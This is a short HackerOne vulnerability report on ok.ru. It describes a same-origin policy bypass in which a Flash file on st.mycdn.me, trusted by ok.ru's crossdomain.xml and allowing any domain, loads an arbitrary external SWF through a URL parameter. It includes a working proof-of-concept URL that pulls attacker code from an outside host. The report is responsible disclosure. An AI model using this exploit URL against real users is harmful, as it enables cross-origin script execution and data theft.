ok.ru: Same-Origin Policy Bypass #2

ID H1:102236
Type hackerone
Reporter zoczus
Modified 2016-05-04T12:31:53



This is really similar issue to my previous report #102234 - exploitation mechanism is really same but other swf file is vulnerable. All conditions are met:

  • st.mycdn.me domain which is in ok.ru crossdomain.xml
  • Security.allowDomain('*')
  • possibility to execute own SWF code provided by URL parameter.

Example of swf code execution: https://st.mycdn.me/static/moderator/6-1-6/Main.swf?retry_timer=30&skip_timer=8500&disableAgeCheck=true&v=55&player=https://uid0.pl/poc/xss.swf (shoud execute same code like https://uid0.pl/poc/xss.swf)

I know this report is much sorter and less detailed than previous one. I also belive I don't need to explain it again because all is in previous report and exploit mechanism is really the same... BUT if you want me to prepare different PoC for this case - no problem at all.

Have a nice day, JZ